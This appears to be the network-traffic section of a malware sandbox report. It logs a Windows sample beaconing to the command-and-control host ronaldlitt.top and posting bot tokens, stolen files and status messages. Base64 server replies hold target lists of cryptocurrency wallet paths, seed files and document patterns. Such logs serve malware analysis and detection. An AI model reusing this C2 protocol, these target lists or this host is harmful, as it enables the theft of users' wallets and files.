May 28, 2023 09:29:53.269191027 CEST	1565	OUT	Data Raw: 77 54 6c 63 62 68 67 74 6e 48 46 65 66 58 6d 6d 54 57 45 73 63 64 31 46 35 62 79 51 70 4f 67 33 41 35 52 31 44 4b 65 50 55 45 56 58 38 6d 50 30 6f 39 6e 4a 39 66 36 31 2f 7a 2f 41 41 31 75 48 74 49 72 70 2f 57 6e 2b 58 2b 52 37 46 62 61 46 5a 36 Data Ascii: wTlcbhgtnHFefXmmTWEscd1F5byQpOg3A5R1DKePUEVX8mP0o9nJ9f61/z/AA1uHtIrp/Wn+X+R7FbaFZ6DrOmeXoY+3SjULNkeKeNLgrbZVogZmZwx3KG+UMGOFBAI8kmV1uJVktvsziRg0GGHlHP3cMSeOnJJ45rSl8HarDYG9NrE0Yt1umSK6iklSFgCJGiVi6rgjkqAM80228PalPp63qQxJA4YxedcxxPMB1MaOwaTnj5Q
May 28, 2023 09:29:53.269602060 CEST	1568	OUT	Data Raw: 53 73 4b 6c 50 6e 6a 79 2f 31 73 31 2b 70 74 43 70 79 75 35 36 46 49 4e 41 75 4e 48 30 61 30 74 59 74 4d 67 74 58 57 30 38 7a 55 58 76 4c 51 79 77 53 35 41 6c 4c 77 46 42 4d 33 7a 62 67 51 7a 73 6d 43 44 77 42 78 4a 71 45 6d 6b 53 58 38 62 32 55 Data Ascii: SsKlPnjy/1s1+ptCpyu56FINAuNH0a0tYtMgtXW08zUXvLQywS5AlLwFBM3zbgQzsmCDwBxJqEmkSX8b2UWgw6sdKk8qOe4s5bcTif+MoqW+/ys4yuOmckA15x5S+lHlL/dFQ6Mn17/AIlKrFdO34HqX27Q5NWvpWj0a/1KOx09IoxeWsUG1YsTLG06PFkNtGMBsZwRgg8f4ju7P+xtJs7G206EkXElysHlyyownlCK0qjJATbj
May 28, 2023 09:29:53.269680023 CEST	1571	OUT	Data Raw: 67 70 39 56 39 50 63 56 43 66 48 76 69 4a 4c 78 70 59 74 55 6c 5a 41 32 56 57 52 56 77 52 37 6a 47 4b 39 6d 30 50 55 6c 31 7a 51 4c 57 2b 61 4d 44 37 52 48 6c 30 36 6a 50 51 6a 36 5a 42 72 7a 36 31 66 47 34 53 30 36 6b 6c 4a 50 2b 75 78 36 46 47 Data Ascii: gp9V9PcVCfHviJLxpYtUlZA2VWRVwR7jGK9m0PUl1zQLW+aMD7RHl06jPQj6ZBrz61fG4S06klJP+ux6FGhgsXeFNOLX9dz5yrG8S/8g2P/AK7D+Rrt/GWjLofie6tIhiBiJYh6K3OPwOR+FcR4l/5Bsf8A12H8jXp1pqphnOOzR5lCDp4lQlumcrRRRXgn0AlFFJQM+uNM0qwl0yyd7dATAmSFHPyir39i2P8ABCvTP3FNR6V/
May 28, 2023 09:29:53.269774914 CEST	1573	OUT	Data Raw: 50 35 47 74 6d 73 58 78 4e 2f 79 44 59 2f 2b 75 77 2f 6b 61 39 36 72 54 56 4c 44 4f 45 64 6b 6a 77 71 56 52 31 63 55 70 79 33 62 4f 57 46 4a 53 34 6f 72 77 6a 33 78 4b 4b 58 46 46 41 48 31 2f 70 5a 2f 34 6b 39 6c 2f 77 42 63 45 2f 38 41 51 52 58 Data Ascii: P5GtmsXxN/yDY/+uw/ka96rTVLDOEdkjwqVR1cUpy3bOWFJS4orwj3xKKXFFAH1/pZ/4k9l/wBcE/8AQRXKaPIy+O9dQzHy/NhODHvTJHQ5+79RXU6Yf+JPZf8AXBP/AEEVyXh+Rp/HmvSJHOuJo1/dttPGQSV/iBxXymD1rM9LG/DD1/Q65Whg8MzP+4jVkIzEx2kkkDrzyT0rP8XAj4b66SOtg5H/AH6FP1mzuNU8DXVpa/vL
May 28, 2023 09:29:53.270236969 CEST	1576	OUT	Data Raw: 68 67 71 73 4b 69 6b 39 6b 55 4b 4b 4b 4b 38 6b 39 59 4b 4b 4b 4b 41 50 66 66 68 2f 77 44 45 75 7a 31 6d 33 74 39 4a 31 4c 5a 61 36 67 69 69 4f 4d 35 77 6b 2b 42 67 59 39 47 39 75 2f 62 30 72 70 62 54 78 76 34 4f 31 44 56 4a 62 4b 61 36 74 37 61 Data Ascii: hgqsKik9kUKKKK8k9YKKKKAPffh/wDEuz1m3t9J1LZa6giiOM5wk+BgY9G9u/b0rpbTxv4O1DVJbKa6t7a/tpjEwuV8kl1JHD9CMjgE5r5dBIORwRTnd5JGkkZndiSzMckk9zXBDLqcKkpx2fQ6nipSgoyV7H15quoWegeGpr26upBaQBGM0gMhALgD7vUcjpXI+JPHvhnVvA2t29trlpLcS2kixx/NGzErgABgDnPavnyLWNSh
May 28, 2023 09:29:53.270255089 CEST	1579	OUT	Data Raw: 34 68 73 64 47 75 62 43 77 73 62 47 57 2b 6a 67 43 51 57 71 52 79 77 72 76 43 34 38 33 47 39 6a 6a 67 37 32 62 6e 6e 72 69 71 74 33 34 6d 76 37 2f 53 57 30 32 37 74 74 50 61 48 7a 52 50 43 30 46 73 74 73 59 5a 4d 59 33 67 51 37 46 5a 69 4f 4d 75 Data Ascii: 4hsdGubCwsbGW+jgCQWqRywrvC483G9jjg72bnnriqt34mv7/SW027ttPaHzRPC0FstsYZMY3gQ7FZiOMuGx2xUOoa/q2qw+XeXELsWVnnS1iSaQjoXlVQ7nv8AMTzz1rnUJ822n/Df1/TOiUotb6/8Oan28a7Y+IIrnSrCySxg+0Wv2e1WJ4CsqJ5bMo3PkMR85JyAc9aseMLW1tbS9a3tYISviO+gUxxhSI1WPanH8IycDoM1
May 28, 2023 09:29:53.329287052 CEST	1581	OUT	Data Raw: 4b 57 69 6e 59 56 78 4d 55 43 6c 70 65 31 41 43 63 34 6f 78 37 55 74 41 6f 45 4a 73 48 70 53 65 57 44 54 36 55 63 55 37 49 4c 73 6a 38 72 30 4e 49 59 6d 71 58 4e 4f 46 48 4c 63 4f 5a 6c 62 59 77 37 55 59 49 71 7a 52 6a 50 61 6a 32 59 63 35 56 70 Data Ascii: KWinYVxMUClpe1ACc4ox7UtAoEJsHpSeWDT6UcU7ILsj8r0NIYmqXNOFHLcOZlbYw7UYIqzRjPaj2Yc5Vpas7F9KQxLS5GPnRXoqfyPQ00wMKXKwUkRAUtO8th2pMEUWKuJilFFL2oEFLRS0xCUtFKKYgpKdQBTEIBS4paKYriYpQKXFGKADFLijFLimISlFKRQBTEGKAKKWgQUUUUwCnUgpaYmFLSUopoQopaQU6mhBRRTqYhK
May 28, 2023 09:29:53.493484974 CEST	1688	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.2.5	49766	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:53.860744953 CEST	1689	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGCFBAFBFHJEBGCAEGH Host: ronaldlitt.top Content-Length: 264 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 35 39 34 65 36 37 30 64 38 39 31 63 32 33 35 64 62 33 33 64 35 32 33 30 62 30 35 65 61 30 31 37 33 66 64 31 34 38 39 63 36 65 65 34 33 31 38 39 33 66 64 65 38 38 65 34 39 35 37 39 65 31 37 65 66 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 64 6f 6e 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 2d 2d 0d 0a Data Ascii: ------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="message"done------JDGCFBAFBFHJEBGCAEGH--
May 28, 2023 09:29:53.947704077 CEST	1690	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49717	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:43.570013046 CEST	1416	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJDBGDHIIDAEBFHJJDBF Host: ronaldlitt.top Content-Length: 355 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 35 39 34 65 36 37 30 64 38 39 31 63 32 33 35 64 62 33 33 64 35 32 33 30 62 30 35 65 61 30 31 37 33 66 64 31 34 38 39 63 36 65 65 34 33 31 38 39 33 66 64 65 38 38 65 34 39 35 37 39 65 31 37 65 66 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 61 6d 46 79 5a 47 6c 75 4c 6e 4a 30 5a 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 2d 2d 0d 0a Data Ascii: ------JJDBGDHIIDAEBFHJJDBFContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------JJDBGDHIIDAEBFHJJDBFContent-Disposition: form-data; name="file_name"amFyZGluLnJ0Zg==------JJDBGDHIIDAEBFHJJDBFContent-Disposition: form-data; name="file"------JJDBGDHIIDAEBFHJJDBF--
May 28, 2023 09:29:43.679832935 CEST	1416	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49718	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:43.745273113 CEST	1417	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFBKFIDHIDGHJKFBGHC Host: ronaldlitt.top Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 42 4b 46 49 44 48 49 44 47 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 35 39 34 65 36 37 30 64 38 39 31 63 32 33 35 64 62 33 33 64 35 32 33 30 62 30 35 65 61 30 31 37 33 66 64 31 34 38 39 63 36 65 65 34 33 31 38 39 33 66 64 65 38 38 65 34 39 35 37 39 65 31 37 65 66 35 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 4b 46 49 44 48 49 44 47 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 4b 46 49 44 48 49 44 47 48 4a 4b 46 42 47 48 43 2d 2d 0d 0a Data Ascii: ------CBFBKFIDHIDGHJKFBGHCContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------CBFBKFIDHIDGHJKFBGHCContent-Disposition: form-data; name="message"wallets------CBFBKFIDHIDGHJKFBGHC--
May 28, 2023 09:29:43.815540075 CEST	1418	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:43 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1460 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 46 78 43 61 58 52 6a 62 32 6c 75 58 48 64 68 62 47 78 6c 64 48 4e 63 66 48 64 68 62 47 78 6c 64 43 35 6b 59 58 52 38 4d 58 78 43 61 58 52 6a 62 32 6c 75 49 45 4e 76 63 6d 55 67 54 32 78 6b 66 46 78 43 61 58 52 6a 62 32 6c 75 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 6b 59 58 52 38 4d 48 78 45 62 32 64 6c 59 32 39 70 62 6e 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 58 46 4a 68 64 6d 56 75 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 6b 59 58 52 38 4d 48 78 45 59 57 56 6b 59 57 78 31 63 79 42 4e 59 57 6c 75 62 6d 56 30 66 46 78 45 59 57 56 6b 59 57 78 31 63 79 42 4e 59 57 6c 75 62 6d 56 30 58 48 64 68 62 47 78 6c 64 48 4e 63 66 48 4e 6f 5a 53 6f 75 63 33 46 73 61 58 52 6c 66 44 42 38 51 6d 78 76 59 32 74 7a 64 48 4a 6c 59 57 30 67 52 33 4a 6c 5a 57 35 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 58 45 64 79 5a 57 56 75 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 78 66 46 64 68 63 32 46 69 61 53 42 58 59 57 78 73 5a 58 52 38 58 46 64 68 62 47 78 6c 64 46 64 68 63 32 46 69 61 56 78 44 62 47 6c 6c 62 6e 52 63 56 32 46 73 62 47 56 30 63 31 78 38 4b 69 35 71 63 32 39 75 66 44 42 38 52 58 52 6f 5a 58 4a 6c 64 57 31 38 58 45 56 30 61 47 56 79 5a 58 56 74 58 48 78 72 5a 58 6c 7a 64 47 39 79 5a 58 77 77 66 45 56 73 5a 57 4e 30 63 6e 56 74 66 46 78 46 62 47 56 6a 64 48 4a 31 62 56 78 33 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 69 70 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 55 78 55 51 33 78 63 52 57 78 6c 59 33 52 79 64 57 30 74 54 46 52 44 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 77 66 45 56 34 62 32 52 31 63 33 78 63 52 58 68 76 5a 48 56 7a 58 48 78 6c 65 47 39 6b 64 58 4d 75 59 32 39 75 5a 69 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 66 46 78 46 65 47 39 6b 64 58 4e 63 66 48 64 70 62 6d 52 76 64 79 31 7a 64 47 46 30 5a 53 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 63 47 46 7a 63 33 42 6f 63 6d 46 7a 5a 53 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 63 32 56 6c 5a 43 35 7a 5a 57 4e 76 66 44 42 38 52 58 68 76 5a 48 56 7a 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 61 57 35 6d 62 79 35 7a 5a 57 4e 76 66 44 42 38 52 57 78 6c 59 33 52 79 62 32 34 67 51 32 46 7a 61 48 78 63 52 57 78 6c 59 33 52 79 62 32 35 44 59 58 4e 6f 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 77 66 45 31 31 62 48 52 70 52 47 39 6e 5a 58 78 63 54 58 56 73 64 47 6c 45 62 32 64 6c 58 48 78 74 64 57 78 30 61 57 52 76 5a 32 55 75 64 32 46 73 62 47 56 30 66 44 42 38 53 6d 46 34 65 43 42 45 5a 58 4e 72 64 47 39 77 49 43 68 76 62 47 51 70 66 46 78 71 59 58 68 34 58 45 78 76 59 32 46 73 49 46 4e 30 62 33 4a 68 5a 32 56 63 66 47 5a 70 62 47 56 66 58 7a 41 75 62 47 39 6a 59 57 78 7a 64 47 39 79 59 57 64 6c 66 44 42 38 53 6d 46 34 65 43 42 45 5a 58 4e 72 64 47 39 77 66 46 78 6a 62 32 30 75 62 47 6c 69 5a 58 4a 30 65 53 35 71 59 58 68 34 58 45 6c 75 5a 47 56 34 5a 57 52 45 51 6c 78 6d 61 57 78 6c 58 31 Data Ascii: Qml0Y29pbiBDb3JlfFxCaXRjb2luXHdhbGxldHNcfHdhbGxldC5kYXR8MXxCaXRjb2luIENvcmUgT2xkfFxCaXRjb2luXHwqd2FsbGV0Ki5kYXR8MHxEb2dlY29pbnxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8XFJhdmVuXHwqd2FsbGV0Ki5kYXR8MHxEYWVkYWx1cyBNYWlubmV0fFxEYWVkYWx1cyBNYWlubmV0XHdhbGxldHNcfHNoZSouc3FsaXRlfDB8QmxvY2tzdHJlYW0gR3JlZW58XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8XFdhbGxldFdhc2FiaVxDbGllbnRcV2FsbGV0c1x8Ki5qc29ufDB8RXRoZXJldW18XEV0aGVyZXVtXHxrZXlzdG9yZXwwfEVsZWN0cnVtfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3xcRWxlY3RydW0tTFRDXHdhbGxldHNcfCouKnwwfEV4b2R1c3xcRXhvZHVzXHxleG9kdXMuY29uZi5qc29ufDB8RXhvZHVzfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8cGFzc3BocmFzZS5qc29ufDB8RXhvZHVzfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8c2VlZC5zZWNvfDB8RXhvZHVzfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHxcRWxlY3Ryb25DYXNoXHdhbGxldHNcfCouKnwwfE11bHRpRG9nZXxcTXVsdGlEb2dlXHxtdWx0aWRvZ2Uud2FsbGV0fDB8SmF4eCBEZXNrdG9wIChvbGQpfFxqYXh4XExvY2FsIFN0b3JhZ2VcfGZpbGVfXzAubG9jYWxzdG9yYWdlfDB8SmF4eCBEZXNrdG9wfFxjb20ubGliZXJ0eS5qYXh4XEluZGV4ZWREQlxmaWxlX1
May 28, 2023 09:29:43.815572977 CEST	1418	IN	Data Raw: 38 77 4c 6d 6c 75 5a 47 56 34 5a 57 52 6b 59 69 35 73 5a 58 5a 6c 62 47 52 69 58 48 77 71 4c 69 70 38 4d 48 78 42 64 47 39 74 61 57 4e 38 58 47 46 30 62 32 31 70 59 31 78 4d 62 32 4e 68 62 43 42 54 64 47 39 79 59 57 64 6c 58 47 78 6c 64 6d 56 73 Data Ascii: 8wLmluZGV4ZWRkYi5sZXZlbGRiXHwqLip8MHxBdG9taWN8XGF0b21pY1xMb2NhbCBTdG9yYWdlXGxldmVsZGJcfCouKnwwfEJpbmFuY2V8XEJpbmFuY2VcfGFwcC1zdG9yZS5qc29ufDB8QmluYW5jZXxcQmluYW5jZVx8c2ltcGxlLXN0b3JhZ2UuanNvbnwwfEJpbmFuY2V8XEJpbmFuY2VcfC5maW5nZXItcHJpbnQuZnB8M

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49719	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:43.881159067 CEST	1419	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJDGIECFCAKKFHIIIJE Host: ronaldlitt.top Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 35 39 34 65 36 37 30 64 38 39 31 63 32 33 35 64 62 33 33 64 35 32 33 30 62 30 35 65 61 30 31 37 33 66 64 31 34 38 39 63 36 65 65 34 33 31 38 39 33 66 64 65 38 38 65 34 39 35 37 39 65 31 37 65 66 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 2d 2d 0d 0a Data Ascii: ------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="message"files------JJJDGIECFCAKKFHIIIJE--
May 28, 2023 09:29:43.948245049 CEST	1420	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:43 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 788 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 52 45 39 44 55 33 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 6b 62 32 4e 34 4c 43 6f 75 65 47 78 7a 65 48 77 31 66 44 46 38 4d 58 78 53 52 55 4e 4f 56 48 77 6c 55 6b 56 44 52 55 35 55 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 6b 62 32 4e 34 4c 43 6f 75 65 47 78 7a 65 48 77 31 66 44 46 38 4d 58 78 53 52 55 4e 4f 56 48 77 6c 55 6b 56 44 52 55 35 55 4a 56 78 38 4b 6d 56 34 62 32 52 31 63 79 6f 75 63 47 35 6e 4c 43 70 6c 65 47 39 6b 64 58 4d 71 4c 6e 42 6b 5a 69 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 6c 65 47 39 6b 64 58 4d 71 4c 6e 42 75 5a 79 77 71 5a 58 68 76 5a 48 56 7a 4b 69 35 77 5a 47 59 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 35 6e 4c 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 6b 5a 69 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 62 6d 63 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 52 6d 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 62 6d 63 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 6b 5a 69 77 71 62 57 56 30 59 57 31 68 63 32 73 71 4c 69 6f 73 4b 6c 56 55 51 79 30 74 4b 69 34 71 66 44 45 31 4d 44 42 38 4d 58 77 78 66 45 52 50 51 31 4e 38 4a 55 52 46 55 30 74 55 54 31 41 6c 58 48 77 71 5a 58 68 76 5a 48 56 7a 4b 69 35 77 62 6d 63 73 4b 6d 56 34 62 32 52 31 63 79 6f 75 63 47 52 6d 4c 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 75 5a 79 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 5a 47 59 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 35 6e 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 6b 5a 69 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 35 6e 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 5a 47 59 73 4b 6d 31 6c 64 47 46 74 59 58 4e 72 4b 69 34 71 4c 43 70 56 56 45 4d 74 4c 53 6f 75 4b 6e 77 78 4e 54 41 77 66 44 46 38 4d 58 77 3d Data Ascii: REVTS3wlREVTS1RPUCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8RE9DU3wlRE9DVU1FTlRTJVx8Ki50eHQsKi5kb2N4LCoueGxzeHw1fDF8MXxSRUNOVHwlUkVDRU5UJVx8Ki50eHQsKi5kb2N4LCoueGxzeHw1fDF8MXxSRUNOVHwlUkVDRU5UJVx8KmV4b2R1cyoucG5nLCpleG9kdXMqLnBkZiwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8REVTS3wlREVTS1RPUCVcfCpleG9kdXMqLnBuZywqZXhvZHVzKi5wZGYsKndhbGxldCoucG5nLCp3YWxsZXQqLnBkZiwqYmFja3VwKi5wbmcsKmJhY2t1cCoucGRmLCpyZWNvdmVyKi5wbmcsKnJlY292ZXIqLnBkZiwqbWV0YW1hc2sqLiosKlVUQy0tKi4qfDE1MDB8MXwxfERPQ1N8JURFU0tUT1AlXHwqZXhvZHVzKi5wbmcsKmV4b2R1cyoucGRmLCp3YWxsZXQqLnBuZywqd2FsbGV0Ki5wZGYsKmJhY2t1cCoucG5nLCpiYWNrdXAqLnBkZiwqcmVjb3ZlcioucG5nLCpyZWNvdmVyKi5wZGYsKm1ldGFtYXNrKi4qLCpVVEMtLSouKnwxNTAwfDF8MXw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.5	49720	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:44.149048090 CEST	1421	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKE Host: ronaldlitt.top Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
